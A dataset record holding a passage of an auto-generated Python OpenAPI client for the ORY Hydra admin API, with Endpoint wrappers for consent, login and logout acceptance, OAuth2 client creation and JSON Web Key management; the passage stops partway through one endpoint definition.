hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9aa78cda69a1582791b4e99628cc066f8c0d4542
| 147,670
|
py
|
Python
|
clients/hydra/python/ory_hydra_client/api/admin_api.py
|
UkonnRa/sdk
|
23ab5408a89cdf6ba7a6d8944f8d1b1cdc68aa4c
|
[
"Apache-2.0"
] | null | null | null |
clients/hydra/python/ory_hydra_client/api/admin_api.py
|
UkonnRa/sdk
|
23ab5408a89cdf6ba7a6d8944f8d1b1cdc68aa4c
|
[
"Apache-2.0"
] | null | null | null |
clients/hydra/python/ory_hydra_client/api/admin_api.py
|
UkonnRa/sdk
|
23ab5408a89cdf6ba7a6d8944f8d1b1cdc68aa4c
|
[
"Apache-2.0"
] | null | null | null |
"""
ORY Hydra
Welcome to the ORY Hydra HTTP API documentation. You will find documentation for all HTTP APIs here. # noqa: E501
The version of the OpenAPI document: v1.9.1
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from ory_hydra_client.api_client import ApiClient, Endpoint
from ory_hydra_client.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from ory_hydra_client.model.accept_consent_request import AcceptConsentRequest
from ory_hydra_client.model.accept_login_request import AcceptLoginRequest
from ory_hydra_client.model.completed_request import CompletedRequest
from ory_hydra_client.model.consent_request import ConsentRequest
from ory_hydra_client.model.flush_inactive_o_auth2_tokens_request import FlushInactiveOAuth2TokensRequest
from ory_hydra_client.model.generic_error import GenericError
from ory_hydra_client.model.health_status import HealthStatus
from ory_hydra_client.model.json_web_key import JSONWebKey
from ory_hydra_client.model.json_web_key_set import JSONWebKeySet
from ory_hydra_client.model.json_web_key_set_generator_request import JsonWebKeySetGeneratorRequest
from ory_hydra_client.model.login_request import LoginRequest
from ory_hydra_client.model.logout_request import LogoutRequest
from ory_hydra_client.model.o_auth2_client import OAuth2Client
from ory_hydra_client.model.o_auth2_token_introspection import OAuth2TokenIntrospection
from ory_hydra_client.model.previous_consent_session import PreviousConsentSession
from ory_hydra_client.model.reject_request import RejectRequest
from ory_hydra_client.model.version import Version
class AdminApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
# Private implementation for `accept_consent_request`; it is wrapped by the
# Endpoint object registered below and is not called directly by users.
def __accept_consent_request(
    self,
    consent_challenge,
    **kwargs
):
    """Accept a Consent Request  # noqa: E501

    When an authorization code, hybrid, or implicit OAuth 2.0 Flow is initiated, ORY Hydra asks the login provider to authenticate the subject and then tell ORY Hydra now about it. If the subject authenticated, he/she must now be asked if the OAuth 2.0 Client which initiated the flow should be allowed to access the resources on the subject's behalf. The consent provider which handles this request and is a web app implemented and hosted by you. It shows a subject interface which asks the subject to grant or deny the client access to the requested scope (\"Application my-dropbox-app wants write access to all your private files\"). The consent challenge is appended to the consent provider's URL to which the subject's user-agent (browser) is redirected to. The consent provider uses that challenge to fetch information on the OAuth2 request and then tells ORY Hydra if the subject accepted or rejected the request. This endpoint tells ORY Hydra that the subject has authorized the OAuth 2.0 client to access resources on his/her behalf. The consent provider includes additional information, such as session data for access and ID tokens, and if the consent request should be used as basis for future requests. The response contains a redirect URL which the consent provider should redirect the user-agent to. # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.accept_consent_request(consent_challenge, async_req=True)
    >>> result = thread.get()

    Args:
        consent_challenge (str):

    Keyword Args:
        body (AcceptConsentRequest): [optional]
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request. If one
            number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        CompletedRequest
            If the method is called asynchronously, returns the request
            thread.
    """
    # Normalize the framework-level options so downstream Endpoint code can
    # rely on every key being present even when the caller omitted it.
    kwargs['async_req'] = kwargs.get(
        'async_req', False
    )
    kwargs['_return_http_data_only'] = kwargs.get(
        '_return_http_data_only', True
    )
    kwargs['_preload_content'] = kwargs.get(
        '_preload_content', True
    )
    kwargs['_request_timeout'] = kwargs.get(
        '_request_timeout', None
    )
    kwargs['_check_input_type'] = kwargs.get(
        '_check_input_type', True
    )
    kwargs['_check_return_type'] = kwargs.get(
        '_check_return_type', True
    )
    kwargs['_host_index'] = kwargs.get('_host_index')
    # The required query parameter travels through kwargs like the options.
    kwargs['consent_challenge'] = \
        consent_challenge
    # NOTE(review): `self` here appears to be the Endpoint instance (which
    # defines call_with_http_info), passed in by the Endpoint machinery via
    # the `callable=` hook below — confirm against ApiClient/Endpoint.
    return self.call_with_http_info(**kwargs)

# Public entry point: couples the OpenAPI routing metadata (path, verb,
# parameter locations, content types) with the private callable above.
self.accept_consent_request = Endpoint(
    settings={
        'response_type': (CompletedRequest,),
        'auth': [],
        'endpoint_path': '/oauth2/auth/requests/consent/accept',
        'operation_id': 'accept_consent_request',
        'http_method': 'PUT',
        'servers': None,
    },
    params_map={
        'all': [
            'consent_challenge',
            'body',
        ],
        'required': [
            'consent_challenge',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'consent_challenge':
                (str,),
            'body':
                (AcceptConsentRequest,),
        },
        'attribute_map': {
            'consent_challenge': 'consent_challenge',
        },
        'location_map': {
            'consent_challenge': 'query',
            'body': 'body',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json'
        ]
    },
    api_client=api_client,
    callable=__accept_consent_request
)
# Private implementation for `accept_login_request`; wrapped by the Endpoint
# registered below.
def __accept_login_request(
    self,
    login_challenge,
    **kwargs
):
    """Accept a Login Request  # noqa: E501

    When an authorization code, hybrid, or implicit OAuth 2.0 Flow is initiated, ORY Hydra asks the login provider (sometimes called \"identity provider\") to authenticate the subject and then tell ORY Hydra now about it. The login provider is an web-app you write and host, and it must be able to authenticate (\"show the subject a login screen\") a subject (in OAuth2 the proper name for subject is \"resource owner\"). The authentication challenge is appended to the login provider URL to which the subject's user-agent (browser) is redirected to. The login provider uses that challenge to fetch information on the OAuth2 request and then accept or reject the requested authentication process. This endpoint tells ORY Hydra that the subject has successfully authenticated and includes additional information such as the subject's ID and if ORY Hydra should remember the subject's subject agent for future authentication attempts by setting a cookie. The response contains a redirect URL which the login provider should redirect the user-agent to. # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.accept_login_request(login_challenge, async_req=True)
    >>> result = thread.get()

    Args:
        login_challenge (str):

    Keyword Args:
        body (AcceptLoginRequest): [optional]
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request. If one
            number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        CompletedRequest
            If the method is called asynchronously, returns the request
            thread.
    """
    # Fill in defaults for all framework-level options (same pattern as the
    # other generated endpoint callables in this class).
    kwargs['async_req'] = kwargs.get(
        'async_req', False
    )
    kwargs['_return_http_data_only'] = kwargs.get(
        '_return_http_data_only', True
    )
    kwargs['_preload_content'] = kwargs.get(
        '_preload_content', True
    )
    kwargs['_request_timeout'] = kwargs.get(
        '_request_timeout', None
    )
    kwargs['_check_input_type'] = kwargs.get(
        '_check_input_type', True
    )
    kwargs['_check_return_type'] = kwargs.get(
        '_check_return_type', True
    )
    kwargs['_host_index'] = kwargs.get('_host_index')
    # Required query parameter is forwarded via kwargs.
    kwargs['login_challenge'] = \
        login_challenge
    # NOTE(review): `self` is presumably the Endpoint instance supplied by
    # the `callable=` mechanism below — confirm against Endpoint.__call__.
    return self.call_with_http_info(**kwargs)

# Public entry point: Endpoint metadata for PUT /oauth2/auth/requests/login/accept.
self.accept_login_request = Endpoint(
    settings={
        'response_type': (CompletedRequest,),
        'auth': [],
        'endpoint_path': '/oauth2/auth/requests/login/accept',
        'operation_id': 'accept_login_request',
        'http_method': 'PUT',
        'servers': None,
    },
    params_map={
        'all': [
            'login_challenge',
            'body',
        ],
        'required': [
            'login_challenge',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'login_challenge':
                (str,),
            'body':
                (AcceptLoginRequest,),
        },
        'attribute_map': {
            'login_challenge': 'login_challenge',
        },
        'location_map': {
            'login_challenge': 'query',
            'body': 'body',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json'
        ]
    },
    api_client=api_client,
    callable=__accept_login_request
)
# Private implementation for `accept_logout_request`; wrapped by the Endpoint
# registered below. Unlike the consent/login variants, this endpoint takes no
# request body.
def __accept_logout_request(
    self,
    logout_challenge,
    **kwargs
):
    """Accept a Logout Request  # noqa: E501

    When a user or an application requests ORY Hydra to log out a user, this endpoint is used to confirm that logout request. No body is required. The response contains a redirect URL which the consent provider should redirect the user-agent to. # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.accept_logout_request(logout_challenge, async_req=True)
    >>> result = thread.get()

    Args:
        logout_challenge (str):

    Keyword Args:
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request. If one
            number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        CompletedRequest
            If the method is called asynchronously, returns the request
            thread.
    """
    # Fill in defaults for all framework-level options.
    kwargs['async_req'] = kwargs.get(
        'async_req', False
    )
    kwargs['_return_http_data_only'] = kwargs.get(
        '_return_http_data_only', True
    )
    kwargs['_preload_content'] = kwargs.get(
        '_preload_content', True
    )
    kwargs['_request_timeout'] = kwargs.get(
        '_request_timeout', None
    )
    kwargs['_check_input_type'] = kwargs.get(
        '_check_input_type', True
    )
    kwargs['_check_return_type'] = kwargs.get(
        '_check_return_type', True
    )
    kwargs['_host_index'] = kwargs.get('_host_index')
    # Required query parameter is forwarded via kwargs.
    kwargs['logout_challenge'] = \
        logout_challenge
    # NOTE(review): `self` is presumably the Endpoint instance supplied by
    # the `callable=` mechanism below — confirm against Endpoint.__call__.
    return self.call_with_http_info(**kwargs)

# Public entry point: PUT /oauth2/auth/requests/logout/accept.
# `content_type` is empty because the request carries no body.
self.accept_logout_request = Endpoint(
    settings={
        'response_type': (CompletedRequest,),
        'auth': [],
        'endpoint_path': '/oauth2/auth/requests/logout/accept',
        'operation_id': 'accept_logout_request',
        'http_method': 'PUT',
        'servers': None,
    },
    params_map={
        'all': [
            'logout_challenge',
        ],
        'required': [
            'logout_challenge',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'logout_challenge':
                (str,),
        },
        'attribute_map': {
            'logout_challenge': 'logout_challenge',
        },
        'location_map': {
            'logout_challenge': 'query',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__accept_logout_request
)
# Private implementation for `create_json_web_key_set`; wrapped by the
# Endpoint registered below.
# NOTE: the parameter name `set` (dictated by the OpenAPI spec) shadows the
# Python builtin within this function body.
def __create_json_web_key_set(
    self,
    set,
    **kwargs
):
    """Generate a New JSON Web Key  # noqa: E501

    This endpoint is capable of generating JSON Web Key Sets for you. There a different strategies available, such as symmetric cryptographic keys (HS256, HS512) and asymetric cryptographic keys (RS256, ECDSA). If the specified JSON Web Key Set does not exist, it will be created. A JSON Web Key (JWK) is a JavaScript Object Notation (JSON) data structure that represents a cryptographic key. A JWK Set is a JSON data structure that represents a set of JWKs. A JSON Web Key is identified by its set and key id. ORY Hydra uses this functionality to store cryptographic keys used for TLS and JSON Web Tokens (such as OpenID Connect ID tokens), and allows storing user-defined keys as well. # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.create_json_web_key_set(set, async_req=True)
    >>> result = thread.get()

    Args:
        set (str): The set

    Keyword Args:
        body (JsonWebKeySetGeneratorRequest): [optional]
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request. If one
            number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        JSONWebKeySet
            If the method is called asynchronously, returns the request
            thread.
    """
    # Fill in defaults for all framework-level options.
    kwargs['async_req'] = kwargs.get(
        'async_req', False
    )
    kwargs['_return_http_data_only'] = kwargs.get(
        '_return_http_data_only', True
    )
    kwargs['_preload_content'] = kwargs.get(
        '_preload_content', True
    )
    kwargs['_request_timeout'] = kwargs.get(
        '_request_timeout', None
    )
    kwargs['_check_input_type'] = kwargs.get(
        '_check_input_type', True
    )
    kwargs['_check_return_type'] = kwargs.get(
        '_check_return_type', True
    )
    kwargs['_host_index'] = kwargs.get('_host_index')
    # Required path parameter is forwarded via kwargs.
    kwargs['set'] = \
        set
    # NOTE(review): `self` is presumably the Endpoint instance supplied by
    # the `callable=` mechanism below — confirm against Endpoint.__call__.
    return self.call_with_http_info(**kwargs)

# Public entry point: POST /keys/{set}.
self.create_json_web_key_set = Endpoint(
    settings={
        'response_type': (JSONWebKeySet,),
        'auth': [],
        'endpoint_path': '/keys/{set}',
        'operation_id': 'create_json_web_key_set',
        'http_method': 'POST',
        'servers': None,
    },
    params_map={
        'all': [
            'set',
            'body',
        ],
        'required': [
            'set',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'set':
                (str,),
            'body':
                (JsonWebKeySetGeneratorRequest,),
        },
        'attribute_map': {
            'set': 'set',
        },
        'location_map': {
            'set': 'path',
            'body': 'body',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json'
        ]
    },
    api_client=api_client,
    callable=__create_json_web_key_set
)
# Private implementation for `create_o_auth2_client`; wrapped by the Endpoint
# registered below. The only user parameter is the request body itself.
def __create_o_auth2_client(
    self,
    body,
    **kwargs
):
    """Create an OAuth 2.0 Client  # noqa: E501

    Create a new OAuth 2.0 client If you pass `client_secret` the secret will be used, otherwise a random secret will be generated. The secret will be returned in the response and you will not be able to retrieve it later on. Write the secret down and keep it somwhere safe. OAuth 2.0 clients are used to perform OAuth 2.0 and OpenID Connect flows. Usually, OAuth 2.0 clients are generated for applications which want to consume your OAuth 2.0 or OpenID Connect capabilities. To manage ORY Hydra, you will need an OAuth 2.0 Client as well. Make sure that this endpoint is well protected and only callable by first-party components. # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.create_o_auth2_client(body, async_req=True)
    >>> result = thread.get()

    Args:
        body (OAuth2Client):

    Keyword Args:
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request. If one
            number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        OAuth2Client
            If the method is called asynchronously, returns the request
            thread.
    """
    # Fill in defaults for all framework-level options.
    kwargs['async_req'] = kwargs.get(
        'async_req', False
    )
    kwargs['_return_http_data_only'] = kwargs.get(
        '_return_http_data_only', True
    )
    kwargs['_preload_content'] = kwargs.get(
        '_preload_content', True
    )
    kwargs['_request_timeout'] = kwargs.get(
        '_request_timeout', None
    )
    kwargs['_check_input_type'] = kwargs.get(
        '_check_input_type', True
    )
    kwargs['_check_return_type'] = kwargs.get(
        '_check_return_type', True
    )
    kwargs['_host_index'] = kwargs.get('_host_index')
    # Required request body is forwarded via kwargs.
    kwargs['body'] = \
        body
    # NOTE(review): `self` is presumably the Endpoint instance supplied by
    # the `callable=` mechanism below — confirm against Endpoint.__call__.
    return self.call_with_http_info(**kwargs)

# Public entry point: POST /clients. `attribute_map` is empty because the
# only parameter is the body, which has no query/path name mapping.
self.create_o_auth2_client = Endpoint(
    settings={
        'response_type': (OAuth2Client,),
        'auth': [],
        'endpoint_path': '/clients',
        'operation_id': 'create_o_auth2_client',
        'http_method': 'POST',
        'servers': None,
    },
    params_map={
        'all': [
            'body',
        ],
        'required': [
            'body',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'body':
                (OAuth2Client,),
        },
        'attribute_map': {
        },
        'location_map': {
            'body': 'body',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json'
        ]
    },
    api_client=api_client,
    callable=__create_o_auth2_client
)
# Private implementation for `delete_json_web_key`; wrapped by the Endpoint
# registered below. Takes two required path parameters and no body.
# NOTE: the parameter name `set` (dictated by the OpenAPI spec) shadows the
# Python builtin within this function body.
def __delete_json_web_key(
    self,
    kid,
    set,
    **kwargs
):
    """Delete a JSON Web Key  # noqa: E501

    Use this endpoint to delete a single JSON Web Key. A JSON Web Key (JWK) is a JavaScript Object Notation (JSON) data structure that represents a cryptographic key. A JWK Set is a JSON data structure that represents a set of JWKs. A JSON Web Key is identified by its set and key id. ORY Hydra uses this functionality to store cryptographic keys used for TLS and JSON Web Tokens (such as OpenID Connect ID tokens), and allows storing user-defined keys as well. # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.delete_json_web_key(kid, set, async_req=True)
    >>> result = thread.get()

    Args:
        kid (str): The kid of the desired key
        set (str): The set

    Keyword Args:
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request. If one
            number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        None
            If the method is called asynchronously, returns the request
            thread.
    """
    # Fill in defaults for all framework-level options.
    kwargs['async_req'] = kwargs.get(
        'async_req', False
    )
    kwargs['_return_http_data_only'] = kwargs.get(
        '_return_http_data_only', True
    )
    kwargs['_preload_content'] = kwargs.get(
        '_preload_content', True
    )
    kwargs['_request_timeout'] = kwargs.get(
        '_request_timeout', None
    )
    kwargs['_check_input_type'] = kwargs.get(
        '_check_input_type', True
    )
    kwargs['_check_return_type'] = kwargs.get(
        '_check_return_type', True
    )
    kwargs['_host_index'] = kwargs.get('_host_index')
    # Required path parameters are forwarded via kwargs.
    kwargs['kid'] = \
        kid
    kwargs['set'] = \
        set
    # NOTE(review): `self` is presumably the Endpoint instance supplied by
    # the `callable=` mechanism below — confirm against Endpoint.__call__.
    return self.call_with_http_info(**kwargs)

# Public entry point: DELETE /keys/{set}/{kid}. `response_type` is None
# because a successful delete returns no payload; `content_type` is empty
# because the request carries no body.
self.delete_json_web_key = Endpoint(
    settings={
        'response_type': None,
        'auth': [],
        'endpoint_path': '/keys/{set}/{kid}',
        'operation_id': 'delete_json_web_key',
        'http_method': 'DELETE',
        'servers': None,
    },
    params_map={
        'all': [
            'kid',
            'set',
        ],
        'required': [
            'kid',
            'set',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'kid':
                (str,),
            'set':
                (str,),
        },
        'attribute_map': {
            'kid': 'kid',
            'set': 'set',
        },
        'location_map': {
            'kid': 'path',
            'set': 'path',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__delete_json_web_key
)
# Private implementation for `delete_json_web_key_set`; wrapped by the
# Endpoint registered below.
# NOTE: the parameter name `set` (dictated by the OpenAPI spec) shadows the
# Python builtin within this function body.
def __delete_json_web_key_set(
    self,
    set,
    **kwargs
):
    """Delete a JSON Web Key Set  # noqa: E501

    Use this endpoint to delete a complete JSON Web Key Set and all the keys in that set. A JSON Web Key (JWK) is a JavaScript Object Notation (JSON) data structure that represents a cryptographic key. A JWK Set is a JSON data structure that represents a set of JWKs. A JSON Web Key is identified by its set and key id. ORY Hydra uses this functionality to store cryptographic keys used for TLS and JSON Web Tokens (such as OpenID Connect ID tokens), and allows storing user-defined keys as well. # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.delete_json_web_key_set(set, async_req=True)
    >>> result = thread.get()

    Args:
        set (str): The set

    Keyword Args:
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request. If one
            number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        None
            If the method is called asynchronously, returns the request
            thread.
    """
    # Fill in defaults for all framework-level options.
    kwargs['async_req'] = kwargs.get(
        'async_req', False
    )
    kwargs['_return_http_data_only'] = kwargs.get(
        '_return_http_data_only', True
    )
    kwargs['_preload_content'] = kwargs.get(
        '_preload_content', True
    )
    kwargs['_request_timeout'] = kwargs.get(
        '_request_timeout', None
    )
    kwargs['_check_input_type'] = kwargs.get(
        '_check_input_type', True
    )
    kwargs['_check_return_type'] = kwargs.get(
        '_check_return_type', True
    )
    kwargs['_host_index'] = kwargs.get('_host_index')
    # Required path parameter is forwarded via kwargs.
    kwargs['set'] = \
        set
    # NOTE(review): `self` is presumably the Endpoint instance supplied by
    # the `callable=` mechanism below — confirm against Endpoint.__call__.
    return self.call_with_http_info(**kwargs)

# Public entry point: DELETE /keys/{set}. `response_type` is None because a
# successful delete returns no payload; `content_type` is empty because the
# request carries no body.
self.delete_json_web_key_set = Endpoint(
    settings={
        'response_type': None,
        'auth': [],
        'endpoint_path': '/keys/{set}',
        'operation_id': 'delete_json_web_key_set',
        'http_method': 'DELETE',
        'servers': None,
    },
    params_map={
        'all': [
            'set',
        ],
        'required': [
